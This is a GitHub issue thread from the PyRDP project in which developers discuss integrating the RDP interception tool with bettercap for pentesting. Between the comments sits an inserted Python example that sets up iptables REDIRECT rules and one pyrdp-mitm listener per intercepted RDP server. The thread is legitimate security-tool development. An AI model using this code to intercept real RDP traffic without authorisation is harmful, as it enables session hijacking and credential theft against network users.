GoSecure / pyrdp

RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact
https://www.gosecure.net/blog/2020/10/20/announcing-pyrdp-1/
GNU General Public License v3.0

Combine with bettercap tcp.proxy #57

Closed obilodeau closed 4 years ago

obilodeau commented 5 years ago

Right now when in use with bettercap, the mitm's destination is fixed. I think that with the proper bettercap tcp.proxy module we could spawn an instance of pyrdp-mitm with the proper destination configured on-the-fly.

@Res260 highlighted the fact that we will probably face problems with servers that need NLA to be set. Need to keep this in mind.

obilodeau commented 5 years ago

https://github.com/bettercap/bettercap/wiki/tcp.proxy

alxbl commented 5 years ago

I looked into this. One step better would be to use nfqueues with the nat table to automatically set up a PyRDP instance per host and effectively MITM transparently (well, as transparent as MITM can be) across any intercepted RDP connection. This would be perfect for pentesting scenarios where RDP can be used as a form of lateral movement or even to gain an initial foothold.

I started prototyping a bettercap module (neither tcp.proxy nor packet.proxy do quite what is required). However, there is going to be a lot of work required for this to scale well and be production ready. That being said, a proof of concept should be a good starting point.

Here's the gist of how it works behind the scenes:

Eventually, PyRDP can be refactored to support multi-target in a single instance, and the bettercap module could be adjusted to communicate the target to PyRDP.

Here's where I'm at right now

I think it should be feasible to get a prototype over the weekend. We can tackle performance issues once it actually has a working form.
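The per-server scheme alxbl sketches above (one PyRDP listener per intercepted RDP server, plus a nat/PREROUTING REDIRECT rule that is installed when that server is first seen and deleted on cleanup), written out as an added example. This is not code from this thread, from PyRDP or from the bettercap module; it assumes `pyrdp-mitm.py` accepts `-l` (listen port) and `-o` (output directory), that the attacker box is already positioned in the path (bettercap's ARP spoofing and `ip_forward`, out of scope here), and that the trigger is a sniffed SYN record in a constructed `src:port > dst:port` form standing in for bettercap's `net.sniff` events. The `Recorder` is a dry-run stand-in so the logic can be exercised without root or a lab:

```python
"""Per-server transparent RDP interception (added example; not PyRDP/bettercap code)."""
import subprocess
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

RDP_PORT = 3389


def redirect_rule(action: str, iface: str, server_ip: str, local_port: int) -> List[str]:
    """iptables command that adds (-A) or deletes (-D) the REDIRECT for one server.

    The rule spec is identical for add and delete, so cleanup removes exactly
    the rule that was installed and nothing else.
    """
    return ["iptables", "-t", "nat", action, "PREROUTING",
            "-i", iface, "-p", "tcp", "-d", server_ip, "--dport", str(RDP_PORT),
            "-j", "REDIRECT", "--to-ports", str(local_port)]


def mitm_command(server_ip: str, local_port: int, output_dir: str) -> List[str]:
    """pyrdp-mitm invocation for one server.

    The -l and -o flags are an assumption of this example; check pyrdp-mitm.py -h.
    """
    return ["pyrdp-mitm.py", "-l", str(local_port), "-o", output_dir, server_ip]


@dataclass
class Instance:
    server_ip: str
    local_port: int
    proc: object  # subprocess.Popen or a dry-run stand-in; only .terminate() is used


class InterceptManager:
    def __init__(self, iface: str = "eth0", base_port: int = 33890,
                 output_dir: str = "pyrdp_output",
                 run: Optional[Callable[[List[str]], object]] = None,
                 spawn: Optional[Callable[[List[str]], object]] = None):
        self.iface = iface
        self.next_port = base_port
        self.output_dir = output_dir
        self.instances: Dict[str, Instance] = {}
        # Injected so the bookkeeping can be tested without running anything.
        self.run = run or (lambda cmd: subprocess.run(cmd, check=True))
        self.spawn = spawn or (lambda cmd: subprocess.Popen(cmd))

    def ensure(self, server_ip: str) -> Instance:
        """Idempotent: exactly one listener and one rule per RDP server."""
        inst = self.instances.get(server_ip)
        if inst is not None:
            return inst
        port = self.next_port
        self.next_port += 1
        # Start the listener before the rule so the first redirected SYN is not refused.
        proc = self.spawn(mitm_command(server_ip, port, self.output_dir))
        try:
            self.run(redirect_rule("-A", self.iface, server_ip, port))
        except Exception:
            proc.terminate()  # do not leave an orphan listener behind
            raise
        inst = Instance(server_ip, port, proc)
        self.instances[server_ip] = inst
        return inst

    def on_flow(self, flow: str) -> Optional[Instance]:
        """Consume one sniffed SYN record "src:port > dst:port"; None if not RDP."""
        _src, dst = (part.strip() for part in flow.split(">", 1))
        dst_ip, dst_port = dst.rsplit(":", 1)
        if int(dst_port) != RDP_PORT:
            return None
        return self.ensure(dst_ip)

    def remove(self, server_ip: str) -> None:
        inst = self.instances.pop(server_ip)
        self.run(redirect_rule("-D", self.iface, server_ip, inst.local_port))
        inst.proc.terminate()

    def cleanup(self) -> None:
        for ip in list(self.instances):
            self.remove(ip)


class Recorder:
    """Dry-run stand-in for iptables and pyrdp-mitm: records instead of executing."""

    def __init__(self):
        self.commands: List[List[str]] = []
        self.spawned: List[List[str]] = []
        self.terminated = 0

    def run(self, cmd: List[str]) -> None:
        self.commands.append(cmd)

    def spawn(self, cmd: List[str]) -> object:
        self.spawned.append(cmd)
        rec = self

        class _Proc:
            def terminate(_self):
                rec.terminated += 1
        return _Proc()


if __name__ == "__main__":
    rec = Recorder()
    mgr = InterceptManager(run=rec.run, spawn=rec.spawn)
    # Constructed flows: two victims, two RDP servers, one non-RDP connection.
    for f in ["10.0.0.5:51234 > 10.0.0.20:3389", "10.0.0.5:51235 > 10.0.0.20:3389",
              "10.0.0.7:40000 > 10.0.0.21:3389", "10.0.0.7:40001 > 10.0.0.21:445"]:
        mgr.on_flow(f)
    mgr.cleanup()
    for c in rec.spawned + rec.commands:
        print(" ".join(c))
```

The reason for one listener per server is that a plain `pyrdp-mitm` listener has a fixed destination and does not learn where the victim was actually going. The single-instance refactor alxbl mentions would replace this with one listener that reads the original destination of each redirected socket via `SO_ORIGINAL_DST` and connects there. Note also that REDIRECT only catches traffic that is already passing through this box, and the NLA caveat from the first comment still applies: interception does not help against servers that enforce NLA.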

alxbl commented 5 years ago

The Proof of Concept now has support for managing PyRDP instances and dynamically creating/cleaning firewall rules. At this point I'd be ready to give it a test run in a lab with actual RDP hijacking. The only thing I want to do before pushing my changes to my repo and open sourcing it is documenting how it works and figuring out how to integrate with bettercap's events.stream and net.sniff modules.

We should also probably give it a spin in a closed-off lab environment with real RDP connections (I've been testing with nc :) )

Pourliver commented 5 years ago

I updated the list above. Once #107 gets merged, I think the only thing left would be to test the tool out of the "lab" environment.

Pourliver commented 5 years ago

So, it's been a while since the bettercap part was done feature-wise. The documentation linked above hasn't been updated in almost two months, but it has been used successfully by someone who had no bettercap and no PyRDP.

So, instead of letting this issue stall, should we try and make a PR upstream? If we do, I'll strip some of the RDP-Relay code since it's not yet ready.

alxbl commented 5 years ago

I have no objections with opening the PR. We'll see what upstream has to say about it and we can make any changes needed to get it accepted.

The only thing I can think of as a nice to have would be a screen capture/demo of the tool in action.

Cheers!

Pourliver commented 5 years ago

Maybe I could record something, I've seen some gifs on Github showcasing features before.

Pourliver commented 5 years ago

So, I merged the documentation after reviewing with @Romounet, and I'd like to open a PR to merge to bettercap's upstream before the end of my internship. I'll make a PR once I feel like the code is clean enough (see https://github.com/GoSecure/bettercap/pull/7)

alxbl commented 4 years ago

The PR was rejected upstream due to having too many external dependencies. That being said, I'm closing this issue as we now have working integration in our bettercap fork (https://github.com/gosecure/bettercap).

We might revisit integration with upstream in the form of a more generic module, but for the time being this works fine.